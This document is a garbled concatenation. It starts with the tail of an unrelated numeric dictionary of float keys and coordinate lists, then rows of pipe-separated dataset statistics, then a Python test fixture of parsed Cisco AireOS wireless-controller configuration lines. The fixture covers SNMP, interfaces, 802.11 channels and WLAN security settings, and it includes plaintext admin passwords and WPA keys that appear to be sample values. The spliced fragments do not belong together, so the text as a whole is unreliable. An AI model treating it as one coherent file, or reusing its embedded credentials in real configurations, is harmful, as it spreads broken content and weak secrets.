[0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.551020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.586734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.396683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.963966836735: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.479272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.514987244898: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.34693877551: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.428571428571: [0.5, 0.0], 0.974170918367: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.249681122449: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.216517857143: [0.875, 0.125], 0.925701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.979591836735: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.530612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.33131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.884885204082: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.367028061224: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.539540816327: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.152742346939: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.602040816327: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.775510204082: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.372130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.979272959184: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.617028061224: [0.9107142857143, 0.0892857142857, 
0.6607142857143, 0.3392857142857], 0.492028061224: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.607142857143: [0.5, 0.0], 0.662946428571: [0.375, 0.625], 0.321428571429: [0.5, 0.0], 0.605867346939: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.325255102041: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.930803571429: [0.875, 0.125], 0.175701530612: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.610969387755: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.091517857143: [0.375, 0.625], 0.759885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.616071428571: [0.75, 0.25], 0.410395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.892538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.849170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.688456632653: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.160395408163: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.520089285714: [0.375, 0.625], 0.466517857143: [0.875, 0.125], 0.117028061224: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.818558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.984375: [0.625, 0.375], 0.509885204082: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.498724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.045599489796: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.912946428571: [0.625, 0.375], 0.481823979592: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.407844387755: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.907844387755: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.749681122449: 
[0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.785395408163: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.568558673469: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.682397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.58131377551: [0.9107142857143, 0.0892857142857, 0.6607142857143, 0.3392857142857], 0.088966836735: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.841517857143: [0.375, 0.625], 0.430803571429: [0.875, 0.125], 0.024234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.70631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.037946428571: [0.875, 0.125], 0.632653061224: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.218112244898: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.086734693878: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.349170918367: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.88137755102: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.392538265306: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.570153061224: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.777742346939: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.95631377551: [0.4107142857143, 0.1607142857143, 0.5892857142857, 0.8392857142857], 0.532844387755: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.323660714286: [0.875, 0.125], 0.499681122449: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.316326530612: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.544642857143: [0.75, 0.25], 0.622130102041: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.586415816327: [0.9464285714286, 0.1964285714286, 
0.0535714285714, 0.8035714285714], 0.673469387755: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.274234693878: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.427295918367: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.637755102041: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.102040816327: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.758928571429: [0.75, 0.25], 0.267538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.555803571429: [0.375, 0.625], 0.211415816327: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.714285714286: [0.5, 0.0], 0.459183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.889987244898: [0.6964285714286, 0.4464285714286, 0.3035714285714, 0.5535714285714], 0.448660714286: [0.375, 0.625], 0.571109693878: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.667091836735: [0.8928571428571, 0.3928571428571, 0.6071428571429, 0.1071428571429], 0.94387755102: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429], 0.432397959184: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.571428571429: [0.5, 0.0], 0.214285714286: [0.5, 0.0], 0.42825255102: [0.5178571428571, 0.4821428571429, 0.7678571428571, 0.2321428571429], 0.280612244898: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.693558673469: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.646683673469: [0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.248724489796: [0.0357142857143, 0.9642857142857, 0.5357142857143, 0.4642857142857], 0.234375: [0.375, 0.625], 0.836415816327: [0.9464285714286, 0.1964285714286, 0.0535714285714, 0.8035714285714], 0.25: [0.5, 0.0], 0.959183673469: [0.5714285714286, 0.4285714285714, 0.9285714285714, 0.0714285714286], 0.003826530612: 
[0.8214285714286, 0.3214285714286, 0.1785714285714, 0.6785714285714], 0.668367346939: [0.2857142857143, 0.7142857142857, 0.7857142857143, 0.2142857142857], 0.517538265306: [0.0178571428571, 0.2678571428571, 0.7321428571429, 0.9821428571429], 0.301020408163: [0.1428571428571, 0.6428571428571, 0.3571428571429, 0.8571428571429]}
| 16,948
| 32,172
| 0.789946
| 10,676
| 84,740
| 6.26967
| 0.047302
| 0.003645
| 0.002734
| 0.003347
| 0.996967
| 0.995638
| 0.995638
| 0.995055
| 0.995055
| 0.992709
| 0
| 0.842233
| 0.062922
| 84,740
| 5
| 32,173
| 16,948
| 0.000693
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
f02d31b5bfcac9eeb6f97ce6e6b4392ab4562d97
| 49
|
py
|
Python
|
coupledmodeldriver/generate/__init__.py
|
WPringle/CoupledModelDriver
|
02fccc8be24c96f545d26d7c7efcacd5dfe8fbe7
|
[
"CC0-1.0"
] | 2
|
2021-05-12T18:01:07.000Z
|
2021-09-09T15:43:56.000Z
|
coupledmodeldriver/generate/__init__.py
|
WPringle/CoupledModelDriver
|
02fccc8be24c96f545d26d7c7efcacd5dfe8fbe7
|
[
"CC0-1.0"
] | 52
|
2021-01-26T21:59:13.000Z
|
2022-03-13T18:20:25.000Z
|
coupledmodeldriver/generate/__init__.py
|
WPringle/CoupledModelDriver
|
02fccc8be24c96f545d26d7c7efcacd5dfe8fbe7
|
[
"CC0-1.0"
] | 2
|
2021-03-30T14:42:39.000Z
|
2021-08-31T22:11:48.000Z
|
from coupledmodeldriver.generate.adcirc import *
| 24.5
| 48
| 0.857143
| 5
| 49
| 8.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 49
| 1
| 49
| 49
| 0.933333
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f06aeb0186bcfa78d220be55f526c48187f30da9
| 33,885
|
py
|
Python
|
tests/unit/mock/config/parser/cisco_aireos/aireos_full_received.py
|
vivekvashist/netutils
|
c2d75178d2613a44f070f55ef94e11866eef8f36
|
[
"Apache-2.0"
] | 91
|
2021-05-13T18:14:57.000Z
|
2022-03-22T14:36:38.000Z
|
tests/unit/mock/config/parser/cisco_aireos/aireos_full_received.py
|
vivekvashist/netutils
|
c2d75178d2613a44f070f55ef94e11866eef8f36
|
[
"Apache-2.0"
] | 61
|
2021-05-15T00:49:31.000Z
|
2022-03-28T06:08:52.000Z
|
tests/unit/mock/config/parser/cisco_aireos/aireos_full_received.py
|
vivekvashist/netutils
|
c2d75178d2613a44f070f55ef94e11866eef8f36
|
[
"Apache-2.0"
] | 26
|
2021-05-13T23:51:40.000Z
|
2022-03-31T12:30:11.000Z
|
from netutils.config.parser import ConfigLine
data = [
ConfigLine(config_line="config sysname POP-101-WLC", parents=()),
ConfigLine(config_line="config prompt POP-101-WLC", parents=()),
ConfigLine(config_line="config mobility group domain POP-101-MG", parents=()),
ConfigLine(config_line="config network rf-network-name POP-101-RF", parents=()),
ConfigLine(config_line="config mgmtuser add POP-101-ADMIN uZrt1E2ouhoZ read-write", parents=()),
ConfigLine(config_line="config mgmtuser telnet POP-101-ADMIN disable", parents=()),
ConfigLine(
config_line="config ap mgmtuser add username POP-101-ADMIN password uZrt1E2ouhoZ secret uZrt1E2ouhoZ all",
parents=(),
),
ConfigLine(config_line="config time ntp server 1 192.168.2.177", parents=()),
ConfigLine(config_line="config snmp version v1 disable", parents=()),
ConfigLine(config_line="config snmp version v2c disable", parents=()),
ConfigLine(config_line="config snmp community delete public", parents=()),
ConfigLine(config_line="config snmp community delete private", parents=()),
ConfigLine(config_line="config snmp version v3 disable", parents=()),
ConfigLine(config_line="config snmp v3user delete default", parents=()),
ConfigLine(config_line="config switchconfig strong-pwd case-check disable", parents=()),
ConfigLine(config_line="config switchconfig strong-pwd consecutive-check disable", parents=()),
ConfigLine(config_line="config switchconfig strong-pwd username-check disable", parents=()),
ConfigLine(config_line="config switchconfig strong-pwd lockout attempts mgmtuser 3", parents=()),
ConfigLine(config_line="config switchconfig strong-pwd lockout time mgmtuser 5", parents=()),
ConfigLine(config_line="config switchconfig strong-pwd default-check disable", parents=()),
ConfigLine(config_line="config network multicast global enable", parents=()),
ConfigLine(config_line="config network multicast igmp snooping enable", parents=()),
ConfigLine(config_line="config network multicast l2mcast disable service-port", parents=()),
ConfigLine(config_line="config network multicast l2mcast disable virtual", parents=()),
ConfigLine(config_line="config network multicast mld snooping enable", parents=()),
ConfigLine(config_line="config network multicast mode multicast 239.255.2.154", parents=()),
ConfigLine(config_line="config mdns snooping disable", parents=()),
ConfigLine(config_line="config lag enable", parents=()),
ConfigLine(config_line="config port adminmode 1 disable", parents=()),
ConfigLine(config_line="config port adminmode 2 disable", parents=()),
ConfigLine(config_line="config port adminmode 3 disable", parents=()),
ConfigLine(config_line="config port adminmode 4 disable", parents=()),
ConfigLine(config_line="config port adminmode 5 enable", parents=()),
ConfigLine(config_line="config switchconfig fips-prerequisite enable", parents=()),
ConfigLine(
config_line="config switchconfig fips-authorization-secret encrypt 1 df54cb494cddd573f74b80cf6436b6e5 c16b31809c669ad447cfa9269d5fd322026e8ace 16 27cc2f098c982310133d043d10579c63000000000000000000000000000000000000000000000000",
parents=(),
),
ConfigLine(config_line="config network webcolor red", parents=()),
ConfigLine(config_line="config network mgmt-via-wireless enable", parents=()),
ConfigLine(config_line="config network ap-priority enable", parents=()),
ConfigLine(config_line="config ap preferred-mode ipv4 all", parents=()),
ConfigLine(config_line="config ap tcp-adjust-mss enable all 1250", parents=()),
ConfigLine(config_line="config dhcp proxy disable bootp-broadcast disable", parents=()),
ConfigLine(config_line="config interface vlan management 40", parents=()),
ConfigLine(config_line="config interface port management 5", parents=()),
ConfigLine(
config_line="config interface address management 192.168.2.154 255.255.255.224 192.168.2.158", parents=()
),
ConfigLine(config_line="config interface dhcp management primary 192.168.2.158", parents=()),
ConfigLine(config_line="config interface dhcp management proxy-mode disable", parents=()),
ConfigLine(config_line="config interface create data 10", parents=()),
ConfigLine(config_line="config interface vlan data 10", parents=()),
ConfigLine(config_line="config interface port data 5", parents=()),
ConfigLine(
config_line="config interface address dynamic-interface data 192.168.1.250 255.255.254.0 192.168.1.254",
parents=(),
),
ConfigLine(config_line="config interface dhcp dynamic-interface data primary 192.168.1.254", parents=()),
ConfigLine(config_line="config interface dhcp dynamic-interface data proxy-mode disable", parents=()),
ConfigLine(config_line="config interface create special 20", parents=()),
ConfigLine(config_line="config interface vlan special 20", parents=()),
ConfigLine(config_line="config interface port special 5", parents=()),
ConfigLine(
config_line="config interface address dynamic-interface special 192.168.2.58 255.255.255.192 192.168.2.62",
parents=(),
),
ConfigLine(config_line="config interface dhcp dynamic-interface special primary 192.168.2.62", parents=()),
ConfigLine(config_line="config interface dhcp dynamic-interface special proxy-mode disable", parents=()),
ConfigLine(config_line="config interface create voice 30", parents=()),
ConfigLine(config_line="config interface vlan voice 30", parents=()),
ConfigLine(config_line="config interface port voice 5", parents=()),
ConfigLine(
config_line="config interface address dynamic-interface voice 192.168.2.122 255.255.255.192 192.168.2.126",
parents=(),
),
ConfigLine(config_line="config interface dhcp dynamic-interface voice primary 192.168.2.126", parents=()),
ConfigLine(config_line="config interface dhcp dynamic-interface voice proxy-mode disable", parents=()),
ConfigLine(config_line="config interface create special 50", parents=()),
ConfigLine(config_line="config interface vlan special 50", parents=()),
ConfigLine(config_line="config interface port special 5", parents=()),
ConfigLine(config_line="config interface address dynamic-interface special 255.255.255.192", parents=()),
ConfigLine(config_line="config interface dhcp dynamic-interface special primary", parents=()),
ConfigLine(config_line="config interface dhcp dynamic-interface special proxy-mode disable", parents=()),
ConfigLine(config_line="config interface address virtual 192.0.2.1", parents=()),
ConfigLine(config_line="config country US", parents=()),
ConfigLine(config_line="config countries-list add US", parents=()),
ConfigLine(config_line="config 802.11b 11gsupport enable", parents=()),
ConfigLine(config_line="config 802.11b rate disabled 1", parents=()),
ConfigLine(config_line="config 802.11b rate disabled 2", parents=()),
ConfigLine(config_line="config 802.11b rate supported 5.5", parents=()),
ConfigLine(config_line="config 802.11b rate supported 6", parents=()),
ConfigLine(config_line="config 802.11b rate supported 9", parents=()),
ConfigLine(config_line="config 802.11b rate mandatory 11", parents=()),
ConfigLine(config_line="config 802.11b rate supported 12", parents=()),
ConfigLine(config_line="config 802.11b rate supported 18", parents=()),
ConfigLine(config_line="config 802.11b rate supported 24", parents=()),
ConfigLine(config_line="config 802.11b rate supported 36", parents=()),
ConfigLine(config_line="config 802.11b rate supported 48", parents=()),
ConfigLine(config_line="config 802.11b rate supported 54", parents=()),
ConfigLine(config_line="config advanced 802.11b edca-parameters optimized-video-voice", parents=()),
ConfigLine(config_line="config advanced 802.11b profile foreign global 10", parents=()),
ConfigLine(config_line="config advanced 802.11b profile clients global 12", parents=()),
ConfigLine(config_line="config advanced 802.11b profile noise global -70", parents=()),
ConfigLine(config_line="config advanced 802.11b profile utilization global 80", parents=()),
ConfigLine(config_line="config advanced 802.11b monitor channel-list all", parents=()),
ConfigLine(config_line="config advanced 802.11b monitor signal 180", parents=()),
ConfigLine(config_line="config advanced 802.11b monitor noise 180", parents=()),
ConfigLine(config_line="config 802.11b channel global auto", parents=()),
ConfigLine(config_line="config advanced 802.11b channel dca interval 1", parents=()),
ConfigLine(config_line="config advanced 802.11b channel foreign enable", parents=()),
ConfigLine(config_line="config advanced 802.11b channel load disable", parents=()),
ConfigLine(config_line="config advanced 802.11b channel noise enable", parents=()),
ConfigLine(config_line="config advanced 802.11b channel device disable", parents=()),
ConfigLine(config_line="config advanced 802.11b channel dca sensitivity medium", parents=()),
ConfigLine(config_line="config advanced 802.11b channel cleanair-event disable", parents=()),
ConfigLine(config_line="config advanced 802.11b channel add 1", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 2", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 3", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 4", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 5", parents=()),
ConfigLine(config_line="config advanced 802.11b channel add 6", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 7", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 8", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 9", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 10", parents=()),
ConfigLine(config_line="config advanced 802.11b channel add 11", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 12", parents=()),
ConfigLine(config_line="config advanced 802.11b channel delete 13", parents=()),
ConfigLine(config_line="config 802.11a rate mandatory 6", parents=()),
ConfigLine(config_line="config 802.11a rate supported 9", parents=()),
ConfigLine(config_line="config 802.11a rate mandatory 12", parents=()),
ConfigLine(config_line="config 802.11a rate supported 18", parents=()),
ConfigLine(config_line="config 802.11a rate mandatory 24", parents=()),
ConfigLine(config_line="config 802.11a rate supported 36", parents=()),
ConfigLine(config_line="config 802.11a rate supported 48", parents=()),
ConfigLine(config_line="config 802.11a rate supported 54", parents=()),
ConfigLine(config_line="config advanced 802.11a edca-parameters optimized-video-voice", parents=()),
ConfigLine(config_line="config 802.11a channel global auto", parents=()),
ConfigLine(config_line="config advanced 802.11a channel dca interval 1", parents=()),
ConfigLine(config_line="config advanced 802.11a channel foreign enable", parents=()),
ConfigLine(config_line="config advanced 802.11a channel load disable", parents=()),
ConfigLine(config_line="config advanced 802.11a channel noise enable", parents=()),
ConfigLine(config_line="config advanced 802.11a channel device disable", parents=()),
ConfigLine(config_line="config advanced 802.11a channel dca sensitivity medium", parents=()),
ConfigLine(config_line="config advanced 802.11a channel dca chan-width 20", parents=()),
ConfigLine(config_line="config advanced 802.11a channel cleanair-event disable", parents=()),
ConfigLine(config_line="config advanced 802.11a channel outdoor-ap-dca disable", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 36", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 40", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 44", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 48", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 52", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 56", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 60", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 64", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 100", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 104", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 108", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 112", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 116", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 120", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 124", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 128", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 132", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 136", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 140", parents=()),
ConfigLine(config_line="config advanced 802.11a channel delete 144", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 149", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 153", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 157", parents=()),
ConfigLine(config_line="config advanced 802.11a channel add 161", parents=()),
ConfigLine(config_line="config advanced 802.11a channel delete 165", parents=()),
ConfigLine(config_line="config wlan create 14 POP-101-DATA POP-101-DATA", parents=()),
ConfigLine(config_line="config wlan radio 14 all", parents=()),
ConfigLine(config_line="config wlan interface 14 data", parents=()),
ConfigLine(config_line="config wlan broadcast-ssid enable 14", parents=()),
ConfigLine(config_line="config wlan nac radius disable 14", parents=()),
ConfigLine(config_line="config wlan mac-filtering disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa enable 14", parents=()),
ConfigLine(config_line="config wlan security ft disable 14", parents=()),
ConfigLine(config_line="config wlan security ft over-the-ds disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 ciphers aes disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 ciphers tkip disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 enable 14", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 ciphers aes enable 14", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 ciphers tkip disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa akm 802.1x disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa akm cckm disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa akm psk enable 14", parents=()),
ConfigLine(config_line="config wlan security wpa akm ft 802.1x disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa akm ft psk disable 14", parents=()),
ConfigLine(config_line="config wlan security web-auth disable 14", parents=()),
ConfigLine(config_line="config wlan security web-auth server-precedence 14 local radius ldap", parents=()),
ConfigLine(config_line="config wlan radius_server acct interim-update disable 14", parents=()),
ConfigLine(config_line="config wlan radius_server auth disable 14", parents=()),
ConfigLine(config_line="config wlan radius_server acct disable 14", parents=()),
ConfigLine(config_line="config wlan qos 14 platinum", parents=()),
ConfigLine(config_line="config wlan avc 14 visibility disable", parents=()),
ConfigLine(config_line="config wlan wmm allow 14", parents=()),
ConfigLine(config_line="config wlan aaa-override disable 14", parents=()),
ConfigLine(config_line="config wlan chd 14 enable", parents=()),
ConfigLine(config_line="config wlan session-timeout 14 0", parents=()),
ConfigLine(config_line="config wlan usertimeout 0 14", parents=()),
ConfigLine(config_line="config wlan ccx aironetiesupport enable 14", parents=()),
ConfigLine(config_line="config wlan peer-blocking disable 14", parents=()),
ConfigLine(config_line="config wlan exclusionlist 14 disabled", parents=()),
ConfigLine(config_line="config wlan exclusionlist 14 60", parents=()),
ConfigLine(config_line="config wlan mfp client enable 14", parents=()),
ConfigLine(config_line="config wlan dtim 802.11a 1 14", parents=()),
ConfigLine(config_line="config wlan dtim 802.11b 1 14", parents=()),
ConfigLine(config_line="config wlan flexconnect local-switching 14 disable", parents=()),
ConfigLine(config_line="config wlan load-balance allow disable 14", parents=()),
ConfigLine(config_line="config wlan band-select allow disable 14", parents=()),
ConfigLine(config_line="config wlan assisted-roaming neighbor-list enable 14", parents=()),
ConfigLine(config_line="config wlan assisted-roaming dual-list disable 14", parents=()),
ConfigLine(config_line="config wlan assisted-roaming prediction disable 14", parents=()),
ConfigLine(config_line="config wlan bss-transition enable 14", parents=()),
ConfigLine(config_line="config wlan dms enable 14", parents=()),
ConfigLine(config_line="config wlan profiling radius dhcp disable 14", parents=()),
ConfigLine(config_line="config wlan profiling radius http disable 14", parents=()),
ConfigLine(config_line="config wlan profiling local dhcp disable 14", parents=()),
ConfigLine(config_line="config wlan profiling local http disable 14", parents=()),
ConfigLine(config_line="config wlan mdns disable 14", parents=()),
ConfigLine(config_line="config wlan security wpa akm psk set-key ascii VlQ5548n 14", parents=()),
ConfigLine(config_line="config wlan enable 14", parents=()),
ConfigLine(config_line="config wlan create 15 POP-101-SPECIAL POP-101-SPECIAL", parents=()),
ConfigLine(config_line="config wlan radio 15 all", parents=()),
ConfigLine(config_line="config wlan interface 15 special", parents=()),
ConfigLine(config_line="config wlan broadcast-ssid enable 15", parents=()),
ConfigLine(config_line="config wlan nac radius disable 15", parents=()),
ConfigLine(config_line="config wlan mac-filtering disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa enable 15", parents=()),
ConfigLine(config_line="config wlan security ft disable 15", parents=()),
ConfigLine(config_line="config wlan security ft over-the-ds disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 ciphers aes disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa wpa1 ciphers tkip disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 enable 15", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 ciphers aes enable 15", parents=()),
ConfigLine(config_line="config wlan security wpa wpa2 ciphers tkip disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa akm 802.1x disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa akm cckm disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa akm psk enable 15", parents=()),
ConfigLine(config_line="config wlan security wpa akm ft 802.1x disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa akm ft psk disable 15", parents=()),
ConfigLine(config_line="config wlan security web-auth disable 15", parents=()),
ConfigLine(config_line="config wlan security web-auth server-precedence 15 local radius ldap", parents=()),
ConfigLine(config_line="config wlan radius_server acct interim-update disable 15", parents=()),
ConfigLine(config_line="config wlan radius_server auth disable 15", parents=()),
ConfigLine(config_line="config wlan radius_server acct disable 15", parents=()),
ConfigLine(config_line="config wlan qos 15 platinum", parents=()),
ConfigLine(config_line="config wlan avc 15 visibility disable", parents=()),
ConfigLine(config_line="config wlan wmm allow 15", parents=()),
ConfigLine(config_line="config wlan aaa-override disable 15", parents=()),
ConfigLine(config_line="config wlan chd 15 enable", parents=()),
ConfigLine(config_line="config wlan session-timeout 15 0", parents=()),
ConfigLine(config_line="config wlan usertimeout 0 15", parents=()),
ConfigLine(config_line="config wlan ccx aironetiesupport enable 15", parents=()),
ConfigLine(config_line="config wlan peer-blocking disable 15", parents=()),
ConfigLine(config_line="config wlan exclusionlist 15 disabled", parents=()),
ConfigLine(config_line="config wlan exclusionlist 15 60", parents=()),
ConfigLine(config_line="config wlan mfp client enable 15", parents=()),
ConfigLine(config_line="config wlan dtim 802.11a 1 15", parents=()),
ConfigLine(config_line="config wlan dtim 802.11b 1 15", parents=()),
ConfigLine(config_line="config wlan flexconnect local-switching 15 disable", parents=()),
ConfigLine(config_line="config wlan load-balance allow disable 15", parents=()),
ConfigLine(config_line="config wlan band-select allow disable 15", parents=()),
ConfigLine(config_line="config wlan assisted-roaming neighbor-list enable 15", parents=()),
ConfigLine(config_line="config wlan assisted-roaming dual-list disable 15", parents=()),
ConfigLine(config_line="config wlan assisted-roaming prediction disable 15", parents=()),
ConfigLine(config_line="config wlan bss-transition enable 15", parents=()),
ConfigLine(config_line="config wlan dms enable 15", parents=()),
ConfigLine(config_line="config wlan profiling radius dhcp disable 15", parents=()),
ConfigLine(config_line="config wlan profiling radius http disable 15", parents=()),
ConfigLine(config_line="config wlan profiling local dhcp disable 15", parents=()),
ConfigLine(config_line="config wlan profiling local http disable 15", parents=()),
ConfigLine(config_line="config wlan mdns disable 15", parents=()),
ConfigLine(config_line="config wlan security wpa akm psk set-key ascii SSVNeVE8 15", parents=()),
